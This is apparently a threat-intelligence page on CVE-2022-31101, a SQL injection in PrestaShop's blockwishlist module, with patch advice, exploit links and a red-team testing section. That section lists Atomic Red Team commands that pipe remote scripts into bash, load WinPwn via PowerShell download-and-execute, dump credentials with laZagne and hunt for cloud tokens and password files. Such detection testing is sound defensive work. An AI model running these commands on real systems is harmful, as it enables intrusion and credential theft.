CVE-2022-31101
Overview
The vulnerability is an SQL injection affecting the PrestaShop blockwishlist extension. It arises from improper sanitization of user-supplied input within the wishlist management functionality, allowing crafted SQL statements to be injected. The flaw specifically impacts the component responsible for handling authenticated customer interactions with their wishlists, enabling manipulation of backend database queries.
Vulnerability Description
prestashop/blockwishlist is a prestashop extension which adds a block containing the customer's wishlists. In affected versions an authenticated customer can perform SQL injection. This issue is fixed in version 2.1.1. Users are advised to upgrade. There are no known workarounds for this issue.
Impact
An authenticated attacker can execute arbitrary SQL commands within the database context of the blockwishlist extension, enabling unauthorized data access or modification. This could lead to disclosure of sensitive customer wishlist information or corruption of stored data. Exploitation requires valid user credentials (PR:L) but no user interaction beyond authentication (UI:N). The network attack vector (AV:N) and low attack complexity (AC:L) increase the feasibility of exploitation in typical deployment environments.
Solution
Users should upgrade the PrestaShop blockwishlist extension to version 2.1.1 or later, where the SQL injection vulnerability has been addressed. Detailed patch information and upgrade instructions are provided in the official GitHub security advisory GHSA-2jx3-5j9v-prpp and the associated commit b3ec4b85af5fd73f74d55390b226d221298ca084. No workarounds are available, making immediate upgrade the primary mitigation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the PrestaShop blockwishlist extension allows for SQL injection, a critical security flaw that can be exploited by authenticated users. This type of vulnerability arises when user input is improperly sanitized, enabling attackers to manipulate SQL queries executed by the application. In this case, an attacker could craft a malicious input that alters the intended SQL command, potentially leading to unauthorized access to sensitive data, data manipulation, or even complete database compromise. The flaw is particularly concerning as it affects a widely used e-commerce platform, which often contains sensitive customer and transactional information.
Attack vectors for this vulnerability primarily involve authenticated users leveraging the blockwishlist functionality. Since the flaw is present in a component that is accessible to customers, it opens the door for malicious actors who may already have legitimate access to the system. Exploitation could occur through various means, such as injecting SQL commands via the wishlist management interface. Once an attacker successfully executes an injection, they could retrieve customer data, modify orders, or escalate privileges, leading to further exploitation of the system. The potential for such attacks underscores the importance of securing user input and maintaining strict access controls.
The real-world impact of this vulnerability can be significant for businesses utilizing the affected PrestaShop extension. An SQL injection attack could lead to data breaches, resulting in the exposure of sensitive customer information, including personal details and payment data. This not only jeopardizes customer trust but also exposes the business to legal ramifications, regulatory fines, and reputational damage. The financial implications can be severe, as remediation efforts, potential lawsuits, and loss of customer confidence can lead to substantial revenue loss. Additionally, the presence of such vulnerabilities can attract further attacks, as malicious actors may exploit the initial breach to gain deeper access into the organization’s infrastructure.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security audits and code reviews are essential to identify and rectify vulnerabilities in third-party extensions. Employing web application firewalls (WAFs) can help filter out malicious input before it reaches the application layer. Furthermore, organizations should ensure that all software components, including extensions like blockwishlist, are kept up to date with the latest security patches. User access controls should also be reviewed and tightened, limiting the permissions of authenticated users to only what is necessary for their roles. Additionally, implementing input validation and parameterized queries can significantly reduce the risk of SQL injection attacks.
In conclusion, the SQL injection vulnerability present in the PrestaShop blockwishlist extension poses a serious threat to organizations utilizing this e-commerce platform. The potential for exploitation by authenticated users highlights the need for robust security practices, including regular updates, thorough input validation, and stringent access controls. By adopting a proactive security posture and prioritizing the remediation of such vulnerabilities, businesses can better protect themselves against the myriad of risks associated with data breaches and cyberattacks.
CSURFACE threat intelligence has detected a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2022-31101, rising by over 60% to place it near the 99th percentile of predicted exploitation likelihood. This significant upward adjustment reflects growing confidence in the exploitability of the PrestaShop blockwishlist SQL injection vulnerability, likely driven by the availability and visibility of multiple proof-of-concept exploits on public repositories. Although the short-term trend has stabilized, the elevated EPSS score signals sustained interest and potential for exploitation attempts in the wild. For defenders, this shift underscores an increased urgency to monitor for exploitation attempts and reinforces the criticality of patching affected systems promptly. The heightened EPSS score effectively elevates the threat level, indicating that adversaries are more likely to weaponize this vulnerability, increasing the risk of unauthorized data access and compromise within environments running vulnerable versions of the blockwishlist module.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Prestashop | Blockwishlist | All |
cpe:2.3:a:prestashop:blockwishlist:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Prestashop blockwishlist module 2.1.0 - SQLi | Karthik UJ | webapps | php | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
MathiasReker/blmvuln
Major Security Vulnerability on PrestaShop Websites - CVE-2022-31101
|
MathiasReker | 42 | 5 | 2022-07-24 | View |
|
karthikuj/CVE-2022-31101
Exploit for PrestaShop bockwishlist module 2.1.0 SQLi (CVE-2022-31101)
|
karthikuj | 25 | 9 | 2022-08-09 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-31101 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/PrestaShop/blockwishlist/security/advisories/GHSA-2jx3-5j9v-prpp |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/PrestaShop/blockwishlist/commit/b3ec4b85af5fd73f74d55390b226d221298ca084 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/168003/Prestashop-Blockwishlist-2.1.0-SQL-Injection.html |